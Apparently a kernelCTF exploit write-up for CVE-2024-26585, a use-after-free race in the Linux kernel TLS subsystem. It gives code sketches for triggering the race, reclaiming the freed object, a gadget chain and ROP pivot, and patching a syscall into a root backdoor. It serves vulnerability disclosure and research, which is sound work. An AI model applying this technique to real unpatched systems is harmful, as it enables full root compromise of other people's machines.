pocs/linux/kernelctf/CVE-2024-26585_lts_cos/docs/exploit.md
## Setup

To trigger TLS encryption we must first configure the socket.
The TLS ULP is attached, and the TX crypto parameters are then set using setsockopt() with the SOL_TLS level:

```
/* The TLS ULP has to be attached before SOL_TLS options are accepted. */
if (setsockopt(sock, IPPROTO_TCP, TCP_ULP, "tls", sizeof("tls")) < 0)
	err(1, "TCP_ULP");

static struct tls12_crypto_info_aes_ccm_128 crypto_info;
crypto_info.info.version = TLS_1_2_VERSION;
crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;
/* key, iv, salt and rec_seq can stay zeroed - their values don't matter here */

if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
	err(1, "TLS_TX");
```

This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase.

In the KernelCTF config, PCRYPT (the parallel crypto engine) is disabled, so our only option for triggering async crypto is CRYPTD (the software async crypto daemon).

Each crypto operation needed for TLS is typically implemented by multiple drivers.
For example, AES encryption in CBC mode is available through aesni_intel, aes_generic, or cryptd (a daemon that runs these basic synchronous crypto operations in parallel using an internal queue).

Available drivers can be examined by looking at /proc/crypto; however, it only lists drivers from currently loaded modules - the Crypto API supports loading additional modules on demand.

As seen in the code snippet above, we have no direct control over which crypto drivers will be used for our TLS encryption.
Drivers are selected automatically by the Crypto API based on a priority field, which is calculated internally to choose the "best" driver.
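
For illustration, a representative /proc/crypto entry might look like this (field values vary by kernel build and hardware; this exact entry is not taken from the target system):

```
name         : ccm(aes)
driver       : ccm_base(ctr(aes-aesni),cbcmac(aes-aesni))
module       : kernel
priority     : 300
refcnt       : 1
selftest     : passed
type         : aead
```

For a given algorithm name, the driver with the highest priority wins the selection.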

By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations.

However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.

The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.

The following code causes the AES-CCM encryption selected for TLS to be handled by cryptd:

```
struct sockaddr_alg sa = {
	.salg_family = AF_ALG,
	.salg_type = "skcipher",
	.salg_name = "cryptd(ctr(aes-generic))"
};
int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);

if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
	err(1, "af_alg bind");

struct sockaddr_alg sa2 = {
	.salg_family = AF_ALG,
	.salg_type = "aead",
	.salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
};

if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa2)) < 0)
	err(1, "af_alg bind");
```


## Triggering use-after-free through race condition

This snippet is the tail of tls_encrypt_done() (see also [vulnerability docs](vulnerability.md)):

```
	if (!pending && ctx->async_notify)
		complete(&ctx->async_wait.completion);
[1]	spin_unlock_bh(&ctx->encrypt_compl_lock);

	if (!ready)
		return;

	/* Schedule the transmission */
	if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
[2]		schedule_delayed_work(&ctx->tx_work.work, 1);
```

To exploit the race condition we have to hit the window between points [1] and [2] and perform the following actions:
1. Close the socket to free the TLS context (struct tls_sw_context_tx).
2. Allocate our own object in place of the TLS context (which comes from the general-purpose kmalloc-192 cache).

To hit this small window and extend it enough to fit our allocations, we turn to the well-known timerfd technique invented by Jann Horn.
The basic idea is to arm an hrtimer-based timerfd to fire during the race window and attach as many epoll watches as RLIMIT_NOFILE allows
to this timerfd, making the interrupt take longer to handle.
For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html).
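
A minimal sketch of the technique (the helper name and the watch count are ours, not taken from the exploit):

```
/*
 * Arm a timerfd to fire inside the race window and attach many epoll
 * watches to it, so the expiry interrupt takes much longer to handle.
 */
#include <sys/timerfd.h>
#include <sys/epoll.h>
#include <err.h>

static void widen_race_window(long fire_ns)
{
	int tfd = timerfd_create(CLOCK_MONOTONIC, 0);
	if (tfd < 0)
		err(1, "timerfd_create");

	/* Each epoll instance watching tfd adds work to the hrtimer interrupt. */
	for (int i = 0; i < 512; i++) {
		int epfd = epoll_create1(0);
		struct epoll_event ev = { .events = EPOLLIN };
		if (epfd < 0 || epoll_ctl(epfd, EPOLL_CTL_ADD, tfd, &ev) < 0)
			err(1, "epoll setup");
	}

	struct itimerspec its = { .it_value.tv_nsec = fire_ns };
	if (timerfd_settime(tfd, 0, &its, NULL) < 0)
		err(1, "timerfd_settime");
}
```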


Exploitation is done in two threads: the main process runs on CPU 0, and a new thread (child_send()) is cloned for each attempt and pinned to CPU 1 (a pinning sketch follows the table).

| CPU 0 | CPU 1 |
| -------- | -------- |
| allocate tls context | - |
| - | exploit calls send(), triggering async crypto ops |
| - | tls_sw_sendmsg() waits on the completion |
| - | cryptd calls tls_encrypt_done() |
| - | tls_encrypt_done() finishes the complete() call |
| - | timer interrupt preempts tls_encrypt_done() |
| send() returns to userspace, unlocking the socket | timerfd code walks all the epoll notifications |
| exploit calls close() to free the tls context | ... |
| exploit allocates a key payload in place of the tls context | ... |
| - | the interrupt finishes and returns control to tls_encrypt_done() |
| - | schedule_delayed_work() is called on attacker-controlled data from ctx |
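
A rough sketch of the CPU split (the real exploit clones child_send() directly; the pthreads wrapper and helper names here are ours):

```
#define _GNU_SOURCE
#include <sched.h>
#include <pthread.h>
#include <err.h>

static void pin_to_cpu(int cpu)
{
	cpu_set_t set;
	CPU_ZERO(&set);
	CPU_SET(cpu, &set);
	/* pid 0 = the calling thread */
	if (sched_setaffinity(0, sizeof(set), &set) < 0)
		err(1, "sched_setaffinity");
}

static void *child_send(void *arg)
{
	pin_to_cpu(1);
	/* ... send() on the TLS socket, racing against CPU 0 ... */
	return NULL;
}

int main(void)
{
	pin_to_cpu(0);
	pthread_t th;
	if (pthread_create(&th, NULL, child_send, NULL))
		err(1, "pthread_create");
	/* ... close() and key-payload reallocation happen here on CPU 0 ... */
	pthread_join(th, NULL);
}
```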


## Getting RIP control

Getting RIP control is trivial when we control the argument to schedule_delayed_work() (struct delayed_work is at offset 0x30 of our victim object tls_sw_context_tx).

```
struct tls_sw_context_tx {
struct crypto_aead * aead_send; /* 0 0x8 */
struct crypto_wait async_wait; /* 0x8 0x28 */
struct tx_work tx_work; /* 0x30 0x60 */
...
};

struct delayed_work {
struct work_struct work; /* 0 0x20 */
struct timer_list timer; /* 0x20 0x28 */
struct workqueue_struct * wq; /* 0x48 0x8 */
int cpu; /* 0x50 0x4 */
};

struct work_struct {
atomic_long_t data; /* 0 0x8 */
struct list_head entry; /* 0x8 0x10 */
work_func_t func; /* 0x18 0x8 */
};

struct timer_list {
struct hlist_node entry; /* 0 0x10 */
long unsigned int expires; /* 0x10 0x8 */
void (*function)(struct timer_list *); /* 0x18 0x8 */
u32 flags; /* 0x20 0x4 */
};
```

Setting timer.function to our desired RIP is all that is needed.

The important thing to note is that our code will be executed from the timer interrupt context.
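
A sketch of how the replacement object could be laid out (offsets follow the struct layouts above; the key-header size comes from the 0x18-byte constraint mentioned below, and the real payload additionally has to satisfy the timer/work field constraints described in the next section):

```
#include <stdint.h>
#include <string.h>

#define OBJ_SIZE       0xc0	/* kmalloc-192 */
#define KEY_HDR        0x18	/* key payload header we can't control */
#define TIMER_FUNC_OFF (0x30 + 0x20 + 0x18)	/* tx_work + timer + function = 0x68 */

/* Fill the key data so that timer_list.function lands on our first gadget. */
static void build_key_data(uint8_t *data, uint64_t gadget1)
{
	memset(data, 0, OBJ_SIZE - KEY_HDR);
	memcpy(data + TIMER_FUNC_OFF - KEY_HDR, &gadget1, sizeof(gadget1));
}
```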

## Pivot to ROP

When the timer function is called, we control the following registers:
- RDI - pointer to our struct timer_list (offset 0x20 into struct delayed_work, 0x50 into struct tls_sw_context_tx)
- R12 - a copy of RDI

We control the entire tls_sw_context_tx object except for the first 0x18 bytes (taken by the key payload header), but many offsets are unusable for storing the ROP chain: the corresponding struct fields either have to hold particular values for the timer to be scheduled, or are modified by the timer subsystem before the timer function is triggered.

Five gadgets are used to pass control to ROP:

#### Gadget 1

```
lea rbp, [rdi - 0x80]
push rbx
mov rbx, rdi
mov rax, qword ptr [rdi + 0x68]
mov rdi, rbp
call __x86_indirect_thunk_rax
```

This subtracts 0x80 from the address of our timer_list and places the result in both RDI and RBP.
Our payload pointer is thus moved backwards, allowing us to use the data preceding the timer_list.
Without this we would be limited to offsets >= 0x50 out of the total 0xc0 (kmalloc-192).

We have actually moved too far back, but the next gadgets fix that.

#### Gadget 2

```
mov rax, qword ptr [r12 + 0x50]
mov rsi, rbp
mov rdi, r12
call __x86_indirect_thunk_rax
```

This copies the moved-back pointer (offset -0x80) into RSI and the original pointer (offset 0) into RDI.

#### Gadget 3

```
push rsi
jmp qword ptr [rbp + 0x48]
```

This pushes the moved-back pointer onto the stack.

#### Gadget 4

```
pop rsp
jmp qword [rsi + 0x66]
```

This pops the moved-back pointer into RSP. That pointer is still too far back, so we need one more gadget.

#### Gadget 5

```
add rsp, 0x38
pop rbx
pop rbp
pop r12
jmp __x86_return_thunk
```

This adds 0x50 to RSP in total (0x38 plus three 8-byte pops), pointing it at the start of our ROP chain, and executes a return thunk to start ROP execution.
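
Putting the pointer arithmetic together (all offsets are taken from the struct layout shown earlier):

```
&timer_list           = ctx + 0x50
gadget 1:   rbp       = ctx + 0x50 - 0x80 = ctx - 0x30
gadgets 3+4: rsp      = ctx - 0x30
gadget 5:   rsp       = ctx - 0x30 + 0x38 + 3*8 = ctx + 0x20
```

so the first-stage ROP chain begins at offset 0x20 of the victim object.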


## Second pivot

At this point we have a full ROP chain, but our space is severely limited.
To have enough room for all of the privilege escalation code we have to pivot again.
This is quite simple: we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy a second-stage ROP chain from userspace into that area.
Then we use a `pop rsp ; ret` gadget to pivot there.
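
A hedged sketch of what the first-stage chain could look like (all addresses below are placeholders, not values from this exploit; gadget/symbol resolution is target-specific):

```
#include <stdint.h>

/* Placeholder addresses - the real exploit resolves these per kernel build. */
#define POP_RDI_RET       0xffffffff81000001UL
#define POP_RSI_RET       0xffffffff81000002UL
#define POP_RDX_RET       0xffffffff81000003UL
#define POP_RSP_RET       0xffffffff81000004UL
#define COPY_USER_GENERIC 0xffffffff81000005UL	/* copy_user_generic_string() */
#define SCRATCH_AREA      0xffffffff82000000UL	/* unused kernel rw area */

static uint64_t stage2[64];	/* second-stage chain, built in userspace */

static const uint64_t stage1[] = {
	POP_RDI_RET, SCRATCH_AREA,	/* rdi = kernel destination */
	POP_RSI_RET, (uint64_t)stage2,	/* rsi = userspace source */
	POP_RDX_RET, sizeof(stage2),	/* rdx = length */
	COPY_USER_GENERIC,		/* copy stage 2 into the kernel */
	POP_RSP_RET, SCRATCH_AREA,	/* pivot RSP into the copied chain */
};
```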

## Privilege escalation

As mentioned before, our ROP chain is executed from interrupt context, so we can't do a traditional commit_creds() to modify the current process's privileges - the current process context is unknown.

We could try locating our exploit process and changing its privileges, but we decided on a different approach: we patch the kernel, creating a backdoor that grants root privileges to any process that executes a given syscall.

We chose the rarely used kexec_file_load() syscall and overwrote its code with our get_root function, which does all the traditional privilege escalation/namespace escape steps: commit_creds(init_cred), switch_task_namespaces(pid, init_nsproxy), etc.

This function also returns a special value (0x777) that our user space code can use to detect if the system was already compromised.
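
From userspace, checking for the backdoor could look like this (a sketch, assuming the patched syscall simply returns 0x777):

```
#include <unistd.h>
#include <sys/syscall.h>

/* Returns 1 once the kexec_file_load() backdoor has been installed. */
static int backdoor_installed(void)
{
	return syscall(SYS_kexec_file_load, 0, 0, 0, 0, 0) == 0x777;
}
```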

Patching the kernel function is done by rop_patch_kernel_code() - it calls set_memory_rw() on the destination memory and uses copy_user_generic() to write the new code there.

It would take a lot of effort to return properly from the interrupt after all the pivots, so we simply jump to an infinite-loop gadget once patching is complete. This makes CPU 1 unusable, but we still have CPU 0, and from there we can call kexec_file_load() to get root privileges.
### Privilege escalation by patching kernel code to introduce a backdoor

In cases where code execution is established but there is no process context in which to escalate privileges (such as interrupt handlers), a simple way forward is to overwrite kernel code, installing a backdoor in one of the syscalls; that backdoor can later be called from any process to gain root privileges.
This is also useful when recovery is impossible and the kernel will hang/oops after the backdoor is installed, rendering the process attempting exploitation useless. With this technique a root shell can be spawned from a completely separate process.

For more details see [exploit docs](exploit.md#privilege-escalation)
pocs/linux/kernelctf/CVE-2024-26585_lts_cos/docs/vulnerability.md
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_TLS and one of [CONFIG_CRYPTO_PCRYPT, CONFIG_CRYPTO_CRYPTD]
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a42055e8d2c30d4decfc13ce943d09c7b9dad221

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb

## Affected kernel versions

Introduced in 4.20. Fixed in 6.1.83, 5.15.164 and other stable trees.

## Affected component, subsystem

net/tls

## Description

TLS encryption works by calling sendmsg() with plaintext as the message on a TLS-configured socket.
The AEAD encryption work is submitted to the crypto subsystem in tls_do_encryption(), which sets tls_encrypt_done() as the callback and calls crypto_aead_encrypt().

If the encryption is performed asynchronously, crypto_aead_encrypt() returns -EINPROGRESS immediately instead of waiting.
Execution then returns to tls_sw_sendmsg(), which waits for the async crypto operations to finish using a completion.

When encryption is finished, the crypto subsystem calls the tls_encrypt_done() callback, which calls complete(), allowing tls_sw_sendmsg() to exit. Once sendmsg() returns, the socket is no longer locked and can be closed, which causes all associated objects to be freed.

Relevant tls_encrypt_done() code:

```
	...

	spin_lock_bh(&ctx->encrypt_compl_lock);
	pending = atomic_dec_return(&ctx->encrypt_pending);

	if (!pending && ctx->async_notify)
[1]		complete(&ctx->async_wait.completion);
	spin_unlock_bh(&ctx->encrypt_compl_lock);

	if (!ready)
		return;

	/* Schedule the transmission */
	if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
[2]		schedule_delayed_work(&ctx->tx_work.work, 1);
}

```

The bug is a race condition: the complete() call at [1] allows the socket to be closed, which frees the ctx object, yet ctx is used again at [2] as an argument to schedule_delayed_work().

If an attacker manages to close the socket and reallocate the freed ctx with controlled data between points [1] and [2], they can easily gain code execution: schedule_delayed_work() schedules the function specified in ctx->tx_work to run after a delay.
Makefile
INCLUDES =
LIBS = -pthread -ldl
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17412.156.69.h
	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
	sudo apt-get install libkeyutils-dev